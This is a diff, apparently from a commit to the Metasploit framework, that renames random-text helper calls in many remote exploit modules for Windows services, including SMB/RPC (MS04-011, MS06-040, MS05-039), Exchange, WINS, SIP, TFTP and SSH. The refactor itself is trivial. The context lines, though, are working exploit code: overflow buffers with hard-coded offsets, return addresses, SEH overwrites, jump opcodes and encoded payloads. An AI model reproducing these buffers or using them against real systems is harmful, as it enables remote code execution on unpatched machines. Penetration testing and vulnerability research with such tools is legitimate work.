||||||
|
|
||||||
##
|
##
|
||||||
|
@ -69,7 +69,7 @@ class Exploits::Windows::Proxy::ProxyPro_Http_Get < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = "GET /" + Rex::Text.rand_text_english(3603, payload_badchars)
|
sploit = "GET /" + rand_text_english(3603, payload_badchars)
|
||||||
sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
|
sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
|
||||||
sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"
|
sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -65,9 +65,9 @@ class Exploits::Windows::Sip::Aim_Triton_Cseq < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect_udp
|
connect_udp
|
||||||
|
|
||||||
user = Rex::Text.rand_text_english(2, payload_badchars)
|
user = rand_text_english(2, payload_badchars)
|
||||||
port = rand(65535).to_s
|
port = rand(65535).to_s
|
||||||
filler = Rex::Text.rand_text_english(792, payload_badchars)
|
filler = rand_text_english(792, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
filler[780, seh.length] = seh
|
filler[780, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,9 +70,9 @@ class Exploits::Windows::Sip::Sipfoundry_CSeq < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
user = Rex::Text.rand_text_english(2, payload_badchars)
|
user = rand_text_english(2, payload_badchars)
|
||||||
port = rand(65535).to_s
|
port = rand(65535).to_s
|
||||||
filler = Rex::Text.rand_text_english(260, payload_badchars)
|
filler = rand_text_english(260, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
filler[252, seh.length] = seh
|
filler[252, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -65,9 +65,9 @@ class Exploits::Windows::Sip::Sipxphone_Cseq < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect_udp
|
connect_udp
|
||||||
|
|
||||||
user = Rex::Text.rand_text_english(2, payload_badchars)
|
user = rand_text_english(2, payload_badchars)
|
||||||
port = rand(65535).to_s
|
port = rand(65535).to_s
|
||||||
filler = Rex::Text.rand_text_english(212, payload_badchars)
|
filler = rand_text_english(212, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
filler[204, seh.length] = seh
|
filler[204, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -88,7 +88,7 @@ class Exploits::Windows::Smb::MS03_049_NETAPI < Msf::Exploit::Remote
|
||||||
print_status("Building the stub data...")
|
print_status("Building the stub data...")
|
||||||
|
|
||||||
|
|
||||||
name = Rex::Text.rand_text_alphanumeric(5000)
|
name = rand_text_alphanumeric(5000)
|
||||||
name[3496, 4] = [target.ret].pack('V')
|
name[3496, 4] = [target.ret].pack('V')
|
||||||
name[3492, 2] = "\xeb\x06"
|
name[3492, 2] = "\xeb\x06"
|
||||||
name[3500, 5] = "\xe9" + [-3505].pack('V')
|
name[3500, 5] = "\xe9" + [-3505].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -105,7 +105,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
# jumps over the return address, some trash, and into the
|
# jumps over the return address, some trash, and into the
|
||||||
# final payload. Easy as pie.
|
# final payload. Easy as pie.
|
||||||
when /Windows 5\.0/
|
when /Windows 5\.0/
|
||||||
str = Rex::Text.rand_text_alphanumeric(3500)
|
str = rand_text_alphanumeric(3500)
|
||||||
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
||||||
str[2104, payload.encoded.length ] = payload.encoded
|
str[2104, payload.encoded.length ] = payload.encoded
|
||||||
string = NDR.UnicodeConformantVaryingString(str)
|
string = NDR.UnicodeConformantVaryingString(str)
|
||||||
|
@ -116,7 +116,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
# buffer, giving us about 1936 bytes of space for a
|
# buffer, giving us about 1936 bytes of space for a
|
||||||
# payload.
|
# payload.
|
||||||
when /Windows 5\.1/
|
when /Windows 5\.1/
|
||||||
str = Rex::Text.rand_text_alphanumeric(7000)
|
str = rand_text_alphanumeric(7000)
|
||||||
str[0, payload.encoded.length ] = payload.encoded
|
str[0, payload.encoded.length ] = payload.encoded
|
||||||
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
||||||
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
||||||
|
@ -138,8 +138,8 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
NDR.UnicodeConformantVaryingString('') +
|
NDR.UnicodeConformantVaryingString('') +
|
||||||
NDR.long(rand(0xFFFFFF)) +
|
NDR.long(rand(0xFFFFFF)) +
|
||||||
NDR.UnicodeConformantVaryingString('') +
|
NDR.UnicodeConformantVaryingString('') +
|
||||||
Rex::Text.rand_text(528) +
|
rand_text(528) +
|
||||||
Rex::Text.rand_text(528) +
|
rand_text(528) +
|
||||||
NDR.long(rand(0xFFFFFF))
|
NDR.long(rand(0xFFFFFF))
|
||||||
|
|
||||||
print_status("Trying to exploit #{os}")
|
print_status("Trying to exploit #{os}")
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -136,7 +136,7 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
|
||||||
NDR.long(0) + # CSD_LegacyDataOffset
|
NDR.long(0) + # CSD_LegacyDataOffset
|
||||||
NDR.long(req.length) + # CSD_LegacyDataSize
|
NDR.long(req.length) + # CSD_LegacyDataSize
|
||||||
NDR.long(0) + # CSD_Flags
|
NDR.long(0) + # CSD_Flags
|
||||||
Rex::Text.rand_text(16) + # GUID
|
rand_text(16) + # GUID
|
||||||
req # CSD_LegacyData
|
req # CSD_LegacyData
|
||||||
|
|
||||||
# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
|
# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
|
||||||
|
@ -188,20 +188,20 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
# Pad the string up to reach our SEH frame
|
# Pad the string up to reach our SEH frame
|
||||||
buf = Rex::Text.rand_text(target['Offset'] ? target['Offset'] : 56)
|
buf = rand_text(target['Offset'] ? target['Offset'] : 56)
|
||||||
|
|
||||||
# Jump over the address and our invalid pointer to the payload
|
# Jump over the address and our invalid pointer to the payload
|
||||||
buf << Rex::Arch::X86.jmp_short('$+32')
|
buf << Rex::Arch::X86.jmp_short('$+32')
|
||||||
buf << Rex::Text.rand_text(2)
|
buf << rand_text(2)
|
||||||
|
|
||||||
# The SEH handler pointer
|
# The SEH handler pointer
|
||||||
buf << [target.ret].pack('V')
|
buf << [target.ret].pack('V')
|
||||||
|
|
||||||
# Some padding to reach the next pointer
|
# Some padding to reach the next pointer
|
||||||
buf << Rex::Text.rand_text(20)
|
buf << rand_text(20)
|
||||||
|
|
||||||
# ResourceName - cause access violation on RtlInitUnicodeString
|
# ResourceName - cause access violation on RtlInitUnicodeString
|
||||||
buf << Rex::Text.rand_text(3) + "\xff"
|
buf << rand_text(3) + "\xff"
|
||||||
|
|
||||||
# Append the encoded payload and we are good to go!
|
# Append the encoded payload and we are good to go!
|
||||||
buf << payload.encoded
|
buf << payload.encoded
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -98,21 +98,21 @@ class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
|
||||||
pat =
|
pat =
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
"\xeb\x06" +
|
"\xeb\x06" +
|
||||||
Rex::Text.rand_text_alphanumeric(2) +
|
rand_text_alphanumeric(2) +
|
||||||
[target.ret].pack('V') +
|
[target.ret].pack('V') +
|
||||||
"\xe9\xb7\xfb\xff\xff"
|
"\xe9\xb7\xfb\xff\xff"
|
||||||
os = 'Windows 2000'
|
os = 'Windows 2000'
|
||||||
when /Windows 5\.1/
|
when /Windows 5\.1/
|
||||||
pat =
|
pat =
|
||||||
Rex::Text.rand_text_alphanumeric(0x4c) +
|
rand_text_alphanumeric(0x4c) +
|
||||||
"\xeb\x06" +
|
"\xeb\x06" +
|
||||||
Rex::Text.rand_text_alphanumeric(2) +
|
rand_text_alphanumeric(2) +
|
||||||
[target.ret].pack('V') +
|
[target.ret].pack('V') +
|
||||||
payload.encoded
|
payload.encoded
|
||||||
os = 'Windows XP'
|
os = 'Windows XP'
|
||||||
end
|
end
|
||||||
|
|
||||||
req = [1, 0x49].pack('VV') + pat + Rex::Text.rand_text_alphanumeric(0x4000-pat.length)
|
req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
|
||||||
len = req.length
|
len = req.length
|
||||||
stb =
|
stb =
|
||||||
NDR.long(0x20000) +
|
NDR.long(0x20000) +
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -192,31 +192,31 @@ class Exploits::Windows::Smb::MS06_040_NETAPI < Msf::Exploit::Remote
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(target['Offset'] - payload.encoded.length) +
|
rand_text_alphanumeric(target['Offset'] - payload.encoded.length) +
|
||||||
|
|
||||||
# Land 6 bytes in to bypass garbage (XP SP0)
|
# Land 6 bytes in to bypass garbage (XP SP0)
|
||||||
[ target.ret + 6 ].pack('V') +
|
[ target.ret + 6 ].pack('V') +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(8) +
|
rand_text_alphanumeric(8) +
|
||||||
|
|
||||||
# Address to write our shellcode (XP SP0)
|
# Address to write our shellcode (XP SP0)
|
||||||
[ target.ret ].pack('V') +
|
[ target.ret ].pack('V') +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(32) +
|
rand_text_alphanumeric(32) +
|
||||||
|
|
||||||
# Jump straight to shellcode (XP SP1)
|
# Jump straight to shellcode (XP SP1)
|
||||||
[ target.ret ].pack('V') +
|
[ target.ret ].pack('V') +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(8) +
|
rand_text_alphanumeric(8) +
|
||||||
|
|
||||||
# Address to write our shellcode (XP SP1)
|
# Address to write our shellcode (XP SP1)
|
||||||
[ target.ret ].pack('V') +
|
[ target.ret ].pack('V') +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(32) +
|
rand_text_alphanumeric(32) +
|
||||||
|
|
||||||
# Terminate the path
|
# Terminate the path
|
||||||
"\x00\x00"
|
"\x00\x00"
|
||||||
|
@ -232,7 +232,7 @@ class Exploits::Windows::Smb::MS06_040_NETAPI < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
when /stack/
|
when /stack/
|
||||||
buff = Rex::Text.rand_text_alphanumeric(800)
|
buff = rand_text_alphanumeric(800)
|
||||||
buff[0, payload.encoded.length] = payload.encoded
|
buff[0, payload.encoded.length] = payload.encoded
|
||||||
buff[ target['OffsetA'], 4 ] = [target.ret].pack('V')
|
buff[ target['OffsetA'], 4 ] = [target.ret].pack('V')
|
||||||
buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V')
|
buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -86,14 +86,14 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Add giant blocks of guard data before and after the egg
|
# Add giant blocks of guard data before and after the egg
|
||||||
eggdata =
|
eggdata =
|
||||||
Rex::Text.rand_text(1024) +
|
rand_text(1024) +
|
||||||
egg +
|
egg +
|
||||||
egg +
|
egg +
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
Rex::Text.rand_text(1024)
|
rand_text(1024)
|
||||||
|
|
||||||
buflen = 295
|
buflen = 295
|
||||||
ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + Rex::Text.rand_text(buflen-hunter[0].length) +
|
ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + rand_text(buflen-hunter[0].length) +
|
||||||
[ target.ret ].pack('V') + "\x00"
|
[ target.ret ].pack('V') + "\x00"
|
||||||
#ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"
|
#ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"
|
||||||
stubdata =
|
stubdata =
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -77,16 +77,16 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
|
||||||
# [in] [unique] wchar *
|
# [in] [unique] wchar *
|
||||||
# [out] long
|
# [out] long
|
||||||
|
|
||||||
ofstring = Rex::Text.to_unicode('\\\\') + Rex::Text.rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"
|
ofstring = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"
|
||||||
stubdata =
|
stubdata =
|
||||||
NDR.long(rand(0xffffffff)) +
|
NDR.long(rand(0xffffffff)) +
|
||||||
NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
|
NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
|
||||||
NDR.long(rand(0xffffffff)) +
|
NDR.long(rand(0xffffffff)) +
|
||||||
NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
|
NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
|
||||||
NDR.long(rand(0xffffffff)) +
|
NDR.long(rand(0xffffffff)) +
|
||||||
NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
|
NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
|
||||||
NDR.long(rand(0xffffffff)) +
|
NDR.long(rand(0xffffffff)) +
|
||||||
NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
|
NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
|
||||||
NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)
|
NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -88,7 +88,7 @@ class Exploits::Windows::Smtp::MS06_019_EXCHANGE < Msf::Exploit::Remote
|
||||||
modproplong << modprops[rand(modprops.size)] + ","
|
modproplong << modprops[rand(modprops.size)] + ","
|
||||||
}
|
}
|
||||||
|
|
||||||
boundry = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)
|
boundry = rand_text_alphanumeric(8) + "." + rand_text_alphanumeric(8)
|
||||||
|
|
||||||
|
|
||||||
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
|
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -68,8 +68,8 @@ class Exploits::Windows::Ssh::Freesshd_key_exchange < Msf::Exploit::Remote
|
||||||
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
||||||
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
||||||
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
||||||
sploit << Rex::Text.rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
||||||
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(19000) + "\r\n"
|
sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
|
||||||
|
|
||||||
res = sock.recv(22)
|
res = sock.recv(22)
|
||||||
if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
|
if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -64,7 +64,7 @@ class Exploits::Windows::Ssh::Securecrt_Ssh1 < Exploit::Remote
|
||||||
def on_client_connect(client)
|
def on_client_connect(client)
|
||||||
return if ((p = regenerate_payload(client)) == nil)
|
return if ((p = regenerate_payload(client)) == nil)
|
||||||
|
|
||||||
buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + Rex::Text.rand_text_english(243)
|
buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
|
||||||
buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded
|
buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded
|
||||||
|
|
||||||
print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")
|
print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -145,7 +145,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
|
||||||
if (datastore['PROTO'] == 'smtp')
|
if (datastore['PROTO'] == 'smtp')
|
||||||
greeting = sock.get_once
|
greeting = sock.get_once
|
||||||
|
|
||||||
sock.put('HELO ' + (Rex::Text.rand_text_alphanumeric(rand(10)+1)) + "\r\n")
|
sock.put('HELO ' + (rand_text_alphanumeric(rand(10)+1)) + "\r\n")
|
||||||
resp = sock.get_once
|
resp = sock.get_once
|
||||||
|
|
||||||
sock.put("STARTTLS\r\n")
|
sock.put("STARTTLS\r\n")
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -79,8 +79,8 @@ class Exploits::Windows::Tftp::Futuresoft_TFTPD_TransferMode < Msf::Exploit::Rem
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = "\x00\x01" + Rex::Text.rand_text_english(14, payload_badchars) + "\x00"
|
sploit = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"
|
||||||
sploit += Rex::Text.rand_text_english(167, payload_badchars)
|
sploit += rand_text_english(167, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit[157, seh.length] = seh
|
sploit[157, seh.length] = seh
|
||||||
sploit += "\x00"
|
sploit += "\x00"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -73,9 +73,9 @@ class Exploits::Windows::Tftp::Tftpd32_Long_Filename < Msf::Exploit::Remote
|
||||||
|
|
||||||
sploit =
|
sploit =
|
||||||
"\x00\x01" +
|
"\x00\x01" +
|
||||||
Rex::Text.rand_text_english(120, payload_badchars) +
|
rand_text_english(120, payload_badchars) +
|
||||||
"." +
|
"." +
|
||||||
Rex::Text.rand_text_english(135, payload_badchars) +
|
rand_text_english(135, payload_badchars) +
|
||||||
[target.ret].pack('V') +
|
[target.ret].pack('V') +
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
"\x00"
|
"\x00"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -76,7 +76,7 @@ class Exploits::Windows::Unicenter::CAM_LOG_SECURITY < Msf::Exploit::Remote
|
||||||
print_status("The CAM service is not responding")
|
print_status("The CAM service is not responding")
|
||||||
end
|
end
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(4096, payload_badchars)
|
buf = rand_text_english(4096, payload_badchars)
|
||||||
|
|
||||||
# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
|
# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
|
||||||
buf[ 1016, 4 ] = [target.ret].pack('V')
|
buf[ 1016, 4 ] = [target.ret].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -121,7 +121,7 @@ class Exploits::Windows::Wins::MS04_045 < Msf::Exploit::Remote
|
||||||
|
|
||||||
wins = addr * 10
|
wins = addr * 10
|
||||||
wins << payload.encoded
|
wins << payload.encoded
|
||||||
wins << Rex::Text.rand_text_english(9200-wins.length, payload_badchars)
|
wins << rand_text_english(9200-wins.length, payload_badchars)
|
||||||
|
|
||||||
wpkt = [wins.length + 8, -1, base].pack('NNN')
|
wpkt = [wins.length + 8, -1, base].pack('NNN')
|
||||||
wpkt << wins
|
wpkt << wins
|
||||||
|
|
Loading…
Reference in New Issue